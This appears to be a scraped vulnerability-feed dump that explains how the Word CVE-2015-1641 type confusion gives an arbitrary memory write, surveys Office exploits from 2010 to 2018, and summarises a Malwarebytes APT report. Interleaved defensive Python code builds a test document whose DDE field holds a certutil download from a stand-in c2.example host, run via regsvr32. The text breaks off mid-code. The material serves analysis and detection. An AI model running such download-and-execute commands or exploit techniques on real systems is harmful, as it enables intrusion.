\nVulnerability principle\nSamples for this vulnerability are usually RTF files, which is relevant to the exploitation discussed below: RTF makes it convenient to assemble the exploit components, although this is not an absolute rule. The root cause, however, has nothing to do with the RTF format; it lies in the implementation of the Office Open XML document format. A common Word document with the extension .docx is in fact a zip package of the document's internal resources organized as Open XML. A typical RTF sample for this vulnerability embeds three docx components: two files that trigger the vulnerability and a third that serves as the exploit (exp) component, again not an absolute rule. \n! [](/Article/UploadPic/2016-12/2016123171529970. png? www. myhack58. com! web) \nThe three zip packages above were extracted from the RTF sample. One simple way to extract them: Word's Insert Object feature can embed another Word document, and this sample was produced by inserting the three docx documents and saving the main document as RTF. Each inserted docx object therefore appears in the main file as a run of hexadecimal data, the hex encoding of the corresponding file, so a regular expression in an editor such as Notepad++ can pull the hex out of the main file: \u201c\\\\\\objdata [0-9a-f\\r\\n]+\u201d. A hex editor such as 010 Editor can then save the decoded data as the three docx/zip files. 
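The extraction step just described, automated as an added example (this is my code for this page, not the article's): locate every \objdata run, decode its hex, and carve the ZIP (docx) container that follows the OLE 1.0 object header. It assumes the embedded docx is present as one contiguous ZIP inside the decoded data, the case the article describes; a docx wrapped in a compound-file Package stream would need an OLE parser such as olefile instead. The sample RTF, its object header and the class name are constructed inline so the script runs offline.

```python
"""Carve embedded ZIP (docx) containers out of the \\objdata runs of an RTF.

Added example, not code from the original article. It automates the manual
Notepad++ regex plus hex-editor procedure: decode the hex stream after each
\\objdata control word and carve any ZIP archive found in the decoded bytes.
The OLE 1.0 object header that precedes the embedded file is skipped by
searching for the ZIP local-file-header signature (an assumption of this
example: the docx must appear as one contiguous ZIP in the decoded data).
"""
import io
import re
import struct
import zipfile

# \objdata is followed by a hex stream that Word wraps across several lines.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
ZIP_LOCAL = b"PK\x03\x04"   # local file header: where an archive begins
ZIP_EOCD = b"PK\x05\x06"    # end-of-central-directory record: where it ends


def objdata_blobs(rtf: bytes) -> list[bytes]:
    """Decode the hex stream of every \\objdata run into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:            # odd nibble count: truncated run, drop the tail
            hexdata = hexdata[:-1]
        blobs.append(bytes.fromhex(hexdata.decode("ascii")))
    return blobs


def carve_zips(blob: bytes) -> list[bytes]:
    """Carve every ZIP archive in blob, whatever data precedes or follows it."""
    out, pos = [], 0
    while (start := blob.find(ZIP_LOCAL, pos)) != -1:
        eocd = blob.find(ZIP_EOCD, start)
        if eocd == -1:
            break                                   # truncated archive: nothing to carve
        comment_len = int.from_bytes(blob[eocd + 20:eocd + 22], "little")
        end = eocd + 22 + comment_len
        candidate = blob[start:end]
        try:
            with zipfile.ZipFile(io.BytesIO(candidate)) as zf:
                # zipfile shifts all offsets to tolerate leading junk, so a PK\x03\x04
                # that is merely a later member of the same archive shows up with a
                # negative header offset for the members before it; reject those.
                valid = bool(zf.infolist()) and all(i.header_offset >= 0 for i in zf.infolist())
        except (zipfile.BadZipFile, OSError, ValueError):
            valid = False
        if valid:
            out.append(candidate)
            pos = end                               # skip this archive's other members
        else:
            pos = start + len(ZIP_LOCAL)
    return out


def extract_embedded_zips(rtf: bytes) -> list[bytes]:
    """All ZIP containers embedded via \\objdata, in document order."""
    return [z for blob in objdata_blobs(rtf) for z in carve_zips(blob)]


def zip_part_names(archive: bytes) -> list[str]:
    """Member names of a carved archive (for a docx, its OOXML parts)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.namelist()


def build_sample_rtf() -> bytes:
    """Constructed test input, not a real sample: an RTF embedding one docx-like ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    docx = buf.getvalue()
    # OLE 1.0 ObjectHeader (OLEVersion, FormatID=2 embedded, ClassName, TopicName,
    # ItemName) followed by NativeDataSize and the native data, per MS-OLEDS.
    header = struct.pack("<II", 0x0501, 2) + struct.pack("<I", 17) + b"Word.Document.12\x00"
    header += struct.pack("<II", 0, 0) + struct.pack("<I", len(docx))
    hexrun = (header + docx).hex().encode("ascii")
    wrapped = b"\r\n".join(hexrun[i:i + 64] for i in range(0, len(hexrun), 64))
    return (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Word.Document.12}"
            b"{\\*\\objdata " + wrapped + b"}}\\par }")


if __name__ == "__main__":
    for n, archive in enumerate(extract_embedded_zips(build_sample_rtf()), 1):
        print(f"object {n}: {len(archive)} bytes, parts {zip_part_names(archive)}")
        # with open(f"object{n}.docx", "wb") as fh: fh.write(archive)
```

On a real sample, call extract_embedded_zips on the file's bytes and write each returned archive out with a .docx extension; the carver validates each candidate by opening it, so stray PK bytes inside the OLE header or the hex stream do not produce false objects.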
Now the analysis of the root cause can begin. First take the second target file, remove its .zip suffix and open it with Office: Word crashes immediately, and in the debugger the crash site is an assignment statement in which ecx holds a stable memory address pointing into msvcr71.dll, the module the exploit uses to bypass ASLR: \n! [](/Article/UploadPic/2016-12/2016123171529671. png? www. myhack58. com! web) \nFrom the file's point of view, adding the .zip suffix back and decompressing it gives the following: \n! [](/Article/UploadPic/2016-12/2016123171529361. png? www. myhack58. com! web) \nHere word/document.xml is the primary part that organizes the document's resources; the document's text content normally lives there too, and in this file we can find the main content that triggers the vulnerability: \n! [](/Article/UploadPic/2016-12/2016123171530503. png? www. myhack58. com! web) \nThe ecx value seen at the crash site in the debugger comes directly from the Unicode-encoded attribute value of the smartTag element, on the condition that the msvcr71 module has already been loaded. What follows is a memory copy: the destination address is a value computed from ecx, and the data copied is 0xffffe696, which is the id value 4294960790 of the child moveFromRange* element: \n! [](/Article/UploadPic/2016-12/2016123171530111. png? www. myhack58. com! web) \nSo, by controlling just two values in the file's contents, the ability to write data to an arbitrary memory address is easily obtained. Of course, what interests us more is why this construct works at all. 
This content is a set of nested Open XML tags: the outermost is the smartTag element, the innermost the moveFromRange* element. The MSDN documentation describes each of these tags in detail; note in particular the description of the displacedByCustomXml attribute of the moveFromRange* element: \n! [](/Article/UploadPic/2016-12/2016123171530291. png? www. myhack58. com! web) \nAs the figure shows, the attribute indicates that the element was displaced by a custom XML element; in other words, this attribute of moveFromRange* says that the parent tag is a customXml object that has been replaced. Yet the sample contains no customXml tag at all. Comparing the documentation of customXml and smartTag reveals that the two elements are not only similar in function but, more interestingly, keep the same internal attribute structure: \n! [](/Article/UploadPic/2016-12/2016123171530419. png? www. myhack58. com! web) \nOne can think of them as twins stamped from the same template that Microsoft, their creator, assigned to different jobs, and sometimes Microsoft itself cannot tell which is which. That is exactly the type confusion: at the crash site seen in the debugger, Word has parsed the moveFromRange* element and is about to transfer its internal id into the \u201cspace\u201d of the parent element, a smartTag that it treats as a customXml object. 
Tracing this process backwards and comparing the two cases: in the normal case, where the parent tag is a customXml, the transfer first allocates memory and then copies the id into the new buffer; in the confused case, because the two objects differ in substance, the id value is written directly into existing internal space of the smartTag object. The following figure contrasts the code paths traced in the two cases: \n! [](/Article/UploadPic/2016-12/2016123171530657. png? www. myhack58. com! web) \nThe similarity of the attribute members inside the two tags is what makes the type confusion possible: the document passes the internal syntax check, but the actual parsing lacks a strict check of the object's internal type. A smartTag object is therefore mistaken for a customXml object, and when moveFromRange* is parsed Word assumes the memory to be replaced already exists and performs the copy at the wrong location, producing this exploitable vulnerability. \nConstructing a POC that triggers the vulnerability \nFrom the principle above, the vulnerable scenario is Word parsing a customXml tag that carries a displacement marker: normally the moveFromRange* tag passes its id up to the parent customXml object, but because customXml and its sibling tag smartTag are so similar, substituting smartTag for customXml causes a type confusion that turns into a memory-copy vulnerability. 
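A triage check for the construct described above, added here as an example (not the article's code): it parses word/document.xml, finds move-range markers, and reports those whose w:id is far outside the range of a real revision counter or whose displacedByCustomXml attribute is set while the nearest enclosing element is a smartTag rather than a customXml. The element and attribute names are the ECMA-376 WordprocessingML ones; the id threshold and both sample documents are assumptions made for this example, with a placeholder in place of the address-bearing smartTag attribute value.

```python
"""Flag the CVE-2015-1641 construct in a docx's word/document.xml.

Added example, not code from the original article. The article pins the
trigger to two attacker-controlled values: a moveFromRange* marker nested
under a smartTag (where a customXml is expected) whose w:id is a huge
value (4294960790 = 0xffffe696 in the sample), with the smartTag's own
attribute value supplying the target address. Assumptions: element and
attribute names follow ECMA-376 WordprocessingML (w:smartTag, w:customXml,
w:moveFromRangeStart/End, w:id, w:displacedByCustomXml); the id threshold
and the two sample documents below are constructed for this example.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
MOVE_MARKERS = {f"{{{W}}}{n}" for n in ("moveFromRangeStart", "moveFromRangeEnd",
                                         "moveToRangeStart", "moveToRangeEnd")}
SMART_TAG, CUSTOM_XML = f"{{{W}}}smartTag", f"{{{W}}}customXml"
ID_THRESHOLD = 1 << 31      # real move-range ids are small counters, never near 2**32


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]


def scan_document_xml(xml_text: str) -> list[dict]:
    """One finding per move-range marker that looks like the type-confusion setup."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        if el.tag not in MOVE_MARKERS:
            continue
        # The nearest enclosing smartTag or customXml is the object Word hands the
        # marker's id to; the bug is a smartTag standing in for a customXml.
        anc = parent_of.get(el)
        while anc is not None and anc.tag not in (SMART_TAG, CUSTOM_XML):
            anc = parent_of.get(anc)
        try:
            wid = int(el.get(f"{{{W}}}id", ""))
        except ValueError:
            wid = None
        reasons = []
        if wid is not None and wid >= ID_THRESHOLD:
            reasons.append(f"id 0x{wid:x} is not a plausible move-range counter")
        if anc is not None and anc.tag == SMART_TAG and el.get(f"{{{W}}}displacedByCustomXml"):
            reasons.append("displacedByCustomXml set but the enclosing element is a smartTag")
        if reasons:
            findings.append({
                "marker": _local(el.tag), "id": wid,
                "ancestor": _local(anc.tag) if anc is not None else None,
                # the smartTag's attributes carry the other controlled value (the address)
                "ancestor_attrs": {_local(k): v for k, v in anc.attrib.items()} if anc is not None else {},
                "reasons": reasons})
    return findings


def is_suspicious(xml_text: str) -> bool:
    """True when a flagged marker sits under a smartTag, the shape the exploit needs."""
    return any(f["ancestor"] == "smartTag" for f in scan_document_xml(xml_text))


def scan_docx(docx: bytes) -> list[dict]:
    """Same check on a whole .docx (zip) rather than an extracted document.xml."""
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        return scan_document_xml(zf.read("word/document.xml").decode("utf-8"))


# Constructed samples (not the real exploit document): the malicious one uses the
# id value the article reports; "AAAA" stands in for the address-bearing attribute.
MALICIOUS_XML = (
    f'<w:document xmlns:w="{W}"><w:body><w:p>'
    '<w:smartTag w:uri="urn:x" w:element="AAAA">'
    '<w:moveFromRangeStart w:id="4294960790" w:displacedByCustomXml="next"'
    ' w:name="m1" w:author="a" w:date="2015-01-01T00:00:00Z"/>'
    '<w:moveFromRangeEnd w:id="4294960790"/>'
    '</w:smartTag></w:p></w:body></w:document>')
BENIGN_XML = (
    f'<w:document xmlns:w="{W}"><w:body><w:p>'
    '<w:customXml w:uri="urn:x" w:element="note">'
    '<w:moveFromRangeStart w:id="1" w:displacedByCustomXml="next" w:name="m1"'
    ' w:author="a" w:date="2015-01-01T00:00:00Z"/>'
    '<w:moveFromRangeEnd w:id="1" w:displacedByCustomXml="next"/>'
    '</w:customXml></w:p></w:body></w:document>')

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_XML), ("benign", BENIGN_XML)):
        print(label, is_suspicious(doc), scan_document_xml(doc))
```

The id threshold is deliberately coarse: legitimate tracked-change ids are allocated sequentially from small numbers, so anything at or above 2^31 is a value the author wrote by hand, and the smartTag-versus-customXml ancestry is what separates this from an ordinary displaced move marker.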
The following describes how to construct a POC sample that triggers the vulnerability. First, one thing must be clear: to achieve the arbitrary-address write we need to control two values, the element attribute value of the confused smartTag tag and the id value of the moveFromRange* tag, which respectively determine the memory address to overwrite and the data written there. Tracing backwards from the crash site mentioned above into the function: \n\n\n**[1] [[2]](<81759_2.htm>) [[3]](<81759_3.htm>) [next](<81759_2.htm>)**\n", "cvss3": {}, "published": "2016-12-03T00:00:00", "type": "myhack58", "title": "Hand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09-bug warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641"], "modified": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81759.htm", "id": "MYHACK58:62201681759", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is an extended summary of my presentation at Bluehat Shanghai 2019. In it I summarize the Office-related 0day/1day vulnerabilities from 2010 to 2018, sort them by type, and reference and categorize the analysis articles relating to each one. \nI hope it helps those who take up Office vulnerability research later. 
\n\nOverview \nFrom 2010 to 2018, 0day/1day attacks against Office never stopped. The CVE numbers below are the 0day/1day vulnerabilities for which I observed actual attack samples during my research (there may be omissions, which readers are welcome to supplement). \nFirst, the specific CVE numbers. \nYear | CVE numbers \n2010 | CVE-2010-3333 \n2011 | CVE-2011-0609/CVE-2011-0611 \n2012 | CVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 | CVE-2013-0634/CVE-2013-3906 \n2014 | CVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 | CVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 | CVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 | CVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 | CVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nNext, the vulnerabilities above classified by the component involved. Note that Flash is itself an ActiveX control; in the table below I place it in a category of its own. 
\nComponent | CVE numbers \nRTF control word parsing | CVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nOpen XML tag parsing | CVE-2015-1641/CVE-2017-11826 \nActiveX control parsing | CVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nFlash embedded in Office | CVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing | CVE-2013-3906 \nOffice EPS file parsing | CVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nLoading via Moniker | CVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerabilities | CVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nNext, the non-Flash vulnerabilities above classified by vulnerability type. For a summary of the Flash vulnerabilities, refer to other researchers' articles. \nVulnerability type | CVE numbers \nStack overflow | CVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nHeap out-of-bounds write | CVE-2014-1761/CVE-2016-7193 \nType confusion | CVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nUse after free | CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow | CVE-2013-3906 \nLogic vulnerability | CVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNow, following the second table above and leaving the Flash vulnerabilities aside, let us look at these vulnerabilities one by one. \n\nRTF control word parsing \nCVE-2010-3333 \nThis vulnerability was found by wushi, head of Keen Lab. It is a stack overflow. 
\nThere are many analyses of this vulnerability on the Pediy (\u770b\u96ea) forum; a few of them: \nCVE-2010-3333 vulnerability analysis (in-depth analysis) \nMS10-087: from vulnerability to patch to POC \nChapter 2, Section 4 of the book Vulnerability Wars (\u6f0f\u6d1e\u6218\u4e89) also gives a fairly systematic description of this vulnerability; interested readers can consult that chapter. \nCVE-2014-1761 \nThis vulnerability is a 0day found by Google. It is a heap out-of-bounds write. \nHaifei Li published an excellent analysis of it: \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nThe Pediy forum has two high-quality analyses as well: \nCVE-2014-1761 analysis notes \nms14-017 (cve-2014-1761) study notes, which also cover how to set up the correct environment \nAnquanke (\u5b89\u5168\u5ba2) also has a high-quality analysis: \nHand-in-hand: how to construct Office exploits (third installment) \nIn addition, AhnLab of South Korea published a report on this vulnerability: \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nWhen debugging this vulnerability, note that some samples have rather demanding trigger conditions; the articles above describe how to build a suitable test environment. \nCVE-2016-7193 \nThis vulnerability is a 0day reported to Microsoft by the Austrian military Cyber Emergency Readiness Team. \nIt is also a heap out-of-bounds write. \nBaidu Security Labs has a fairly complete analysis: \nAPT attack weapon: the principles of Word vulnerability CVE-2016-7193 revealed \nI also wrote an article on exploiting this vulnerability: 
\nBuilding a CVE-2016-7193 pop-calc exploit from an in-the-wild sample \n\nOpen XML tag parsing \nCVE-2015-1641 \nGoogle's 0day tracking spreadsheet lists this as one of the 0days of 2015. \nIt is a type confusion vulnerability. \nFortinet wrote an analysis of it: \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAlibaba Security also wrote an excellent analysis: \nAnalysis of Word type confusion vulnerability CVE-2015-1641 \nAnquanke also has an excellent analysis: \nHand-in-hand: how to construct Office exploits (fourth installment) \nThe Knownsec 404 Team wrote an excellent analysis as well: \nAnalysis of a CVE-2015-1641 Word exploit sample \nI have also written an article on the principles behind this vulnerability: \nAn approach to analyzing Open XML tag parsing vulnerabilities \nWhen debugging the heap spray in this Office sample, pay special attention to the fact that attaching a debugger tends to change the process heap layout, in particular through certain heap option settings. If the sample does not trigger normally under the debugger, which often happens when the sample is launched directly from the debugger, try double-clicking the sample and attaching the debugger afterwards. 
\n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2020-08-07T08:03:43", "description": "_This blog post was authored by Hossein Jazi and J\u00e9r\u00f4me Segura_\n\nOn July 2, we found an archive file with an embedded document pretending to be from the government of India. 
This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike. \n\nOne day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.\n\nOn July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK's prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.\n\nConsidering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.\n\n### Active targeting with different lures\n\nWe were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.\n\n#### 'Mail security check' with Cobalt Strike (variant 1)\n\nThis campaign was most likely carried out through spear phishing emails. The .rar file (_Mail security check.rar_) includes a document with the same name (Figure 1). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/mailsecuritycheck-1.png> \"\" )Figure 1: Mail security check.docx\n\nThe document uses template injection to download a remote template from the following URL (Figure 2). 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplate-1.png> \"\" )Figure 2: Template injection\n\nThe downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document's content (Figure 3).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-1.png> \"\" )Figure 3: Encoded command\n\nAfter decoding, we can see the list of commands that will be executed by DDE:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-1.png> \"\" )Figure 4: Decoded commands\n\nAs Figure 4 shows, the threat actors used _certutil_ with the _-urlcache -split -f_ parameters to download a _com scriptlet_ from their server and then used the _[Squiblydoo](<https://car.mitre.org/analytics/CAR-2019-04-003/>)_ technique to execute the downloaded scriptlet via _regsvr32.exe_ on the victim machine.\n\nThis scriptlet is stored in the _Documents_ directory as "ff.sct". The scriptlet is an XML file that has embedded VBscript (Figure 5). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/sct-file-1.png> \"\" )Figure 5: ff.sct snippet\n\nThe scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanisms and is responsible for injecting the embedded payload into _rundll32.exe_ using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike. \n\nThe following diagram shows the overall process of this attack:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.29.43-PM.png> \"\" )Figure 6: Overall process\n\n#### 'Mail security check' with MgBot (variant 2)\n\nAs we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload. \n\nFigure 7 shows the new encoded commands embedded within the template file. 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-2-1.png> \"\" )Figure 7: Encoded command\n\nFigure 8 shows the list of commands that will be executed by DDE. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-2-1.png> \"\" )Figure 8: Decoded commands\n\nIn this new template file, the _storm.sct_ scriptlet was replaced with _storm.txt_. Similar to the previous version, _certutil_ is used to download the storm.txt file, an executable, which is stored in the Documents directory as ff.exe.\n\nThe following diagram shows the overall execution process:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.30.07-PM.png> \"\" )Figure 9: Overall execution process\n\n#### "Boris Johnson Pledges to Admit 3 Million From Hong Kong" with MgBot (variant 3)\n\nThe last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named "Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar".\n\nThis document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/boris-1.png> \"\" )Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.\n\nSimilar to the other documents, it also uses template injection to download the remote template (Figure 11).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplteBoris-1.png> \"\" )Figure 11: Remote template \n\nThe downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in that it also uses DDE to download and drop its loader. \n\n### Payload analysis: MgBot (BLame, Mgmbot)\n\nThe dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. 
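Before going further into the loader, the document-stage chain described above (template injection, DDE, certutil, Squiblydoo) as an added detection example, not code from the Malwarebytes post: it reads the attachedTemplate relationship out of word/_rels/settings.xml.rels, re-joins split w:instrText runs into whole field codes, decodes the decimal-character-code form in which DDE command lines are commonly hidden, and flags DDE plus the LOLBins named in the post. The sample docx, its URLs and the exact regsvr32 argument form are assumptions of the example; the page does not reproduce the real command line or the encoding shown in its Figure 3.

```python
"""Triage a docx for the delivery chain described above: a remote template
reference (template injection) and DDE field code carrying LOLBin commands.

Added example, not code from the Malwarebytes post. Assumptions: standard
OOXML names (the attachedTemplate relationship in word/_rels/settings.xml.rels,
w:instrText/w:fldSimple field instructions in word/document.xml); the sample
docx built below is constructed for the demo and its URLs are placeholders;
the "QUOTE 99 101 ..." numeric form is one common way DDE commands are hidden
in documents and is not a claim about what the post's Figure 3 shows; the
regsvr32 argument form is the usual Squiblydoo invocation, not quoted from the post.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = R + "/attachedTemplate"
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.I)
LOLBIN_RE = re.compile(r"certutil(?:\.exe)?\s.*?-urlcache|regsvr32(?:\.exe)?\s.*?scrobj\.dll|mshta(?:\.exe)?\s", re.I)
NUMERIC_RE = re.compile(r"(?:\b\d{2,3}\b[ \t]+){3,}\b\d{2,3}\b")


def remote_templates(docx: bytes) -> list[str]:
    """External attachedTemplate targets: the template-injection URL(s)."""
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        if "word/_rels/settings.xml.rels" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("word/_rels/settings.xml.rels"))
    return [r.get("Target") for r in root.iter(f"{{{PKG_REL}}}Relationship")
            if r.get("Type") == ATTACHED_TEMPLATE and r.get("TargetMode") == "External"]


def field_codes(docx: bytes) -> list[str]:
    """Field instructions per paragraph, with instrText runs re-joined
    (attackers split a DDEAUTO across many runs to defeat naive grep)."""
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        root = ET.fromstring(zf.read("word/document.xml"))
    codes = []
    for p in root.iter(f"{{{W}}}p"):
        parts = [t.text or "" for t in p.iter(f"{{{W}}}instrText")]
        parts += [f.get(f"{{{W}}}instr", "") for f in p.iter(f"{{{W}}}fldSimple")]
        text = "".join(parts).strip()
        if text:
            codes.append(text)
    return codes


def decode_numeric(text: str) -> str:
    """Turn runs of decimal character codes (QUOTE-field encoding) back into text."""
    return NUMERIC_RE.sub(lambda m: "".join(chr(int(n)) for n in m.group(0).split()), text)


def triage(docx: bytes) -> list[tuple[str, str]]:
    findings = [("remote_template", t) for t in remote_templates(docx)]
    for code in field_codes(docx):
        decoded = decode_numeric(code)
        if DDE_RE.search(decoded):
            findings.append(("dde_field", decoded))
        if LOLBIN_RE.search(decoded):
            findings.append(("lolbin", decoded))
    return findings


def build_sample_docx() -> bytes:
    """Constructed test input (not the real lure): remote template plus a DDEAUTO
    whose command line is hidden as decimal character codes."""
    cmd = ('"/k certutil -urlcache -split -f http://c2.example/storm.sct '
           '%USERPROFILE%\\Documents\\ff.sct & regsvr32 /s /n /u '
           '/i:%USERPROFILE%\\Documents\\ff.sct scrobj.dll"')
    encoded = " ".join(str(ord(c)) for c in cmd)
    document = (
        f'<w:document xmlns:w="{W}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDEAUTO C:\\Windows\\System32\\cmd.exe </w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">QUOTE {encoded}</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>')
    settings = (f'<w:settings xmlns:w="{W}" xmlns:r="{R}">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    rels = (f'<Relationships xmlns="{PKG_REL}"><Relationship Id="rId1" '
            f'Type="{ATTACHED_TEMPLATE}" Target="http://template.example/ADIN.docx" '
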